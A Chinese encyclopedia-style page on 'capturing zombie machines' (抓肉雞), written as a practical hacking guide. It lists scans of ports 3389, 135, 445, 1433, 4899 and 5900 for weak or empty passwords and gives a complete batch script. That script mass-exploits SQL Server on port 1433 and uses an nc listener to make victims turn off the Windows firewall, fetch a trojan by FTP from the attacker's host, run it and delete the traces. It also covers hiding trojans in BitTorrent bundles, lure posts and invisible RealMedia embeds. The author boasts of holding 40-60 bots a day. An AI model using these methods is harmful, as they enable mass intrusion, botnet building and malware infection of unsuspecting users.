抓肉雞

抓肉雞

抓肉雞,國內常見的抓肉雞連線埠是3389,國外抓肉雞默認連線埠是4899。在國內抓肉雞又叫掃肉雞,簡單的說就是利用對方電腦漏洞進行入侵,或者木馬病毒種植,然後隨便控制對方計算機,為所欲為,比如檔案的刪除,篡改破壞等。抓肉雞3389是指開了連線埠3389的計算機,該連線埠的所有計算機都可以被主控用戶抓肉雞,同理,國外的4899抓肉雞也是一樣的。實現抓肉雞的方式有很多種,其中最普遍的兩種是利用連線埠漏洞進行抓肉雞,是局限於精通網路技術的黑客,第二種是木馬病毒的移植,如灰鴿子,冰河,黑洞軟體等,這兩種方式都有一個共性,技術高深安裝複雜。

基本信息

基本方法

抓肉雞抓肉雞
抓肉雞3389是指開了連線埠3389計算機,該連線埠的所有計算機都可以被主控用戶抓肉雞,同理,國外的4899抓肉雞也是一樣的。實現抓肉雞的方式有很多種,其中最普遍的兩種是利用連線埠漏洞進行抓肉雞,但局限於精通網路技術黑客,第二種是木馬病毒移植,如灰鴿子冰河黑洞軟體等,但是,這兩種方式都有一個共性,技術高深安裝複雜。在此,介紹一款最簡單的抓肉雞軟體,網路人遠程控制軟體

11種方法

首先得準備,免殺的STAT或 一隻免殺鴿子或者其他的遠控,一個免費空間,一些工具(下面會提到)

掃3389連線埠

(適合新手)(抓不了國外肉雞)
現在國內網路上流傳著一種克隆版的XP,安裝後會默認開啟一個賬號為new,密碼為空的賬戶,而且基本上都是開著3389的,我們就可以利用這一點來抓肉雞。首先用連線埠掃描工具(如S掃)掃一段IP的3389連線埠,掃完後就直接用遠程桌面連線開放3389的機器(也可以把結果保存為文本檔案,用批量生成3389連線的工具來連線),然後輸入賬號new登入,如果別人的電腦前沒人的話你就可以去你的空間下載你傳好的木馬安裝拉~~這種方法只針XP系統,如果遇到2000或者2003系統就不要試了呵呵。缺點也很明顯,如果別人不是用new賬號登入XP的,你再登入上去就會把他擠出去(XP只支持單用戶登入,用戶登入需要用工具開),或者電腦前有人你就不可能去打開IE下載木馬了。

掃135連線埠

首先先用連線埠掃描器掃一段IP的135連線埠,然後把結果保存,再用NTSCAN過濾有弱口令的機器,最後用recton開telnet傳馬。因為現在135和445連線埠都被防火牆禁止了,只能掃本地的135肉雞,要抓外地的只能用外地的135肉雞來掃。(詳細動畫可以去黑客網站搜尋135)

掃445連線埠

和掃135抓肉雞差不多,首先先用連線埠掃描器掃一段IP的445連線埠,然後把結果保存,再用NTSCAN過濾有弱口令的機器,最後用啊D工具包開共享傳馬。因為現在135和445連線埠都被防火牆禁止了,只能掃本地的445肉雞,要抓外地的只能用外地的445肉雞來掃。(詳細動畫可以去黑客網站搜尋445)

1433連線埠批量溢出

這個方法可以實現全自動抓雞
要用到的工具:S掃 sqlhello.exe nc.exe批處理檔案
首先先寫個批處理,打開記事本,把以下代碼複製修改後,儲存為掃描+溢出.bat檔案
@echo off
for /f \"eol=; tokens=1,2 delims= \" %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save
@echo off
for /f \"eol=; tokens=1 delims= \" %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556
還要新建一個tt.txt,裡面你要掃的IP段,格式為XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中間是空格
1433是要掃描的連線埠,1000是掃描執行緒數 ,do sqlhello %%i 1433 xxx.xxx.xx.xx 556 這個裡的XXX添你的IP,556是後面NC監聽的連線埠
然後再寫個批處理
@echo off
Nc -l -vv -p 556<nc.txt&&%0 這裡的556要和上面的保持一致,你也可以改成其他的值,但是2處都要改,然後保存為nc.bat
然後再新建一個nc.txt,裡面填寫溢出成功後讓肉雞下載你木馬代碼
這裡給出一種代碼
echo open X.X.X.X(你FTP的IP)>>daima.txt
echo username>>daima.txt
echo password>>daima.txt
echo bin>>daima.txt(以2進制傳輸數據)
echo get xxx.exe(你的木馬的檔案名稱,要放在根目錄下)>>daima.txt
echo bye>>daima.txt
net stop sharedaccess(關閉WINDOWS自帶防火牆)
ftp -s:daima.txt
xxx.exe(也是填你木馬的檔案名稱)
del daima.txt
注意上面的代碼回車符別刪掉,要不然就沒法下你的馬了。
上面的步驟都搞好後,就可以開始掃肉雞了。
先打開多個NC.bat,然後再打開掃描+溢出.bat,然後你就可以去睡大覺了。自動掃描,掃描完後自動溢出,溢出後還自動下馬執行,爽吧!所以這裡講詳細點,呵呵。還有42 21連線埠也可以這樣溢出,只要用這些連線埠的溢出工具就好了,詳細動畫可以去黑客網站搜尋1433。
忘了說,上面的工具和批處理什麼的都要放在同一個資料夾下。

掃1433抓肉雞之2

要用到的工具:連線埠掃描器 X-scanSQL綜合利用工具
上面我們說過了,1433溢出現在成功率已經不高了,所以我們可以用另一種方法。
開了1433連線埠的機器一般都裝了SQL,所以我們可以猜測SQL弱口令來抓1433肉雞。
首先先用連線埠掃描器掃一段IP的1433連線埠,然後結果保存為文本檔案,接著用X-scan導入這些開了1433的IP,然後在掃描參數-全局設定-掃描模組這一欄里只勾上SQL-SERVER就可以了,其他不要勾。然後在外掛程式設定-連線埠相關設定-待檢測連線埠這一欄,只填1433連線埠。然後就可以開始掃描了。掃描完成後會有個報告,列出了有弱口令的機器,然後打開SQL綜合利用工具,輸入你掃到的弱口令來連線,接著打開SQL綜合利用工具-利用目錄,上傳你的木馬,然後在用DOS命令執行你的木馬就OK了。

掃SA弱口令

工具:WINNTAutoAttack SQL綜合利用工具
打開WINNTAutoAttack,找一段IP添上,然後只勾上設定下的僅對PING檢查成功的機器進行檢測和SQL列出密碼為空的SA賬號,接著開始掃描,掃完後,用 SQL綜合利用工具連上傳馬執行就好了。

掃4899空口令

工具:連線埠掃描器 4899探測器 Radmin
首先先用連線埠掃描器掃一段IP的4899連線埠,然後用4899探測器導入開了4899連線埠的IP,接著掃空令,最後用Radmin連線有空口令的機器,帶開檔案管理,上傳的你木馬運行就OK了。詳細動畫可以去黑客網站搜尋4899

掃5900連線埠

工具:VNC掃描器 VNC連線器
首先用VNC掃描器掃描一段IP,掃描格式為vscan.exe(掃描器檔案名稱) -i 219.0.0.0-219.255.255.255(掃描IP段) -p 5900 -vnc -vv
掃描完成後會在掃描器所在的同一資料夾生成一個文本檔案,打開後有一列IP,IP後面的有一些單詞比如patched,banned,vulnerable,只有單詞為vulnerable才能連線。接著就用VNC連線器連線,下面就不用多說了吧? 詳細動畫可以去黑客網站搜尋VNC
接下來說說掛馬抓肉雞吧。方法有很多,比如BT掛馬、免費空間掛馬、迅雷掛馬等等,有些我也還不會,呵呵。下面就介紹幾種我會的。

BT掛馬

顧名思義,就是把你的木馬發布到BT網站讓人下載。當然如果只把單純的木馬檔案發布上去效果肯定不好,而且現在一般的BT網站也不讓發布EXE檔案。所以我們需要一些隱藏的手法。我們可以先把木馬用捆綁器和一些電影音樂遊戲捆綁在一起,再壓縮成RAR檔案發布,誰在開始下載時會知道RAR里有木馬呢?當他費了好大勁下載完,打開發現是EXE的格式後,總有些菜鳥會不想辜負自己花費的時間而忍不住打開吧?尤其是下XXX片的時候當然你也可以做個網頁木馬,然後把你網頁木馬的地址插入到你發布的檔案中(不是所有檔案都可以這樣的,我只知道RM和EXE檔案可以插入),別人下載打開後同時也會帶開你的網頁木馬,如果他的系統沒有補供你網頁木馬所利用的漏洞的話,那他就會中你的馬了。有些朋友可能會想,我把木馬和其他檔案捆綁後格式保持為那個檔案(比如RM捆綁木馬後保持RM格式),那樣別人不就不會懷疑了嗎?呵呵,如果真有這樣的好事那我上面何不說把木馬和BT種子檔案綁在一起發布,那樣你肉雞不抓瘋了才怪~~所以在這裡說一下,木馬和其他檔案捆綁後生成的檔案只能為EXE格式的,除非你有你所捆綁檔案的格式的溢出漏洞,那樣才能把生成後的檔案格式保持為你所捆綁檔案的格式。不過這樣的漏洞現在很少,大多都被補了,就算有別人也不一定會公開,為什麼想想就知道了吧。在這裡就說一個最近的RAR溢出漏洞,針對winrar3.6版本以下的所有版本,只要你winrar版本低於3.6,運行綁了牧馬的RAR檔案後就會中馬。此類木馬症狀為:運行RAR檔案後會彈出一個什麼什麼損壞還是錯誤的對話框,然後RAR檔案體積變小,減少的體積就為木馬的體積。然後再次打開這個RAR檔案一切正常,不會彈出錯誤對話框。在這裡提醒下各位趕快更新下WINRAR版本,小心中馬哈

免費空間掛馬

其實和BT差不多,就是把做好的木馬上傳到你申請的免費空間,然後到論壇發些誘惑性的帖子讓別人下載你的木馬。優點是不用像BT那樣做種子,那樣不僅要開著電腦,還影響網速。我這幾天就是這樣掛的,弄個免費空間,上傳個木馬,到2個XXX論壇發個帖子,每天睡前一頂,才掛了幾天,現在每天肉雞都保持在40-60隻。而且大部分都是美國

RM在論壇掛馬

首先你弄個只有幾秒鐘的RM檔案,然後插入你的網頁木馬,接著上傳到你的空間,然後到一些支持插入RM連線的論壇發帖子,點插入real media 播放器,輸入你的RM牧馬地址,然後高度寬度都設為1(這部是為了保證隱蔽性 ),然後點發貼,這樣別人在瀏覽你的帖子就會運行你的RM木馬,而我們前面把高和寬設為1,在帖子裡RM連線就看不到了。這樣別人就不知不覺中了我們的馬了 好像FLASH木馬也可以這樣的,我沒試過,大家可以去研究下。

相關詞條

相關搜尋

熱門詞條

聯絡我們